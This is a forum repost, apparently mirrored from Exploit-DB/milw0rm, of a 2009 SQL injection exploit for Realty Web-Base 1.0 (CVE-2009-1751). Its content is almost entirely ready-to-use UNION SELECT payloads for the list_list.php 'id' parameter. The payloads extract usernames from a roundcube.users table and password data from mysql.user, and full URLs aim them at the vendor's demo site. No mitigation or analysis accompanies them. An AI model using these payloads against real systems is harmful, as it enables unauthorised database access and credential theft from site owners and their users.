Exploit Realty Web-Base 1.0 - 'list_list.php?id' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8748
Проверка EDB
  1. Пройдено
Автор
THE G0BL!N
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-1751
Дата публикации
2009-05-20
Код:
---------------------------------------------------------------
------------------------------------------------------------
Realty Web-Base v1.0 (list_list.php id) SQL Injection Vulnerability      
---------------------------------------------------------------
Founder : ThE g0bL!N
Home:WwW.h4ckF0u.CoM
Vendor:http://www.realtywebware.com
---------------------------------------------------------------
---------------------------------------------------------------
SQL Injection Vulnerability   
------------------------------------------------
Exploit F0r user:
-----------------
list_list.php?id=-1+UNION%20SELECT%20username,2+from+roundcube.users--
Exploit For Pass:
----------------
list_list.php?id=-1+UNION%20SELECT+password,2+from+mysql.user--
--------------------------------------
Dem0
----
user:
-----
http://www.realtywebware.com/demo/list_list.php?id=-1+UNION%20SELECT%20username,2+from+roundcube.users--
pass:
----
http://www.realtywebware.com/demo/list_list.php?id=-1+UNION%20SELECT+password,2+from+mysql.user--
--------------------------------------
Greeting To ALL My Friends (Dz)

# milw0rm.com [2009-05-20]
 
Источник
www.exploit-db.com

Похожие темы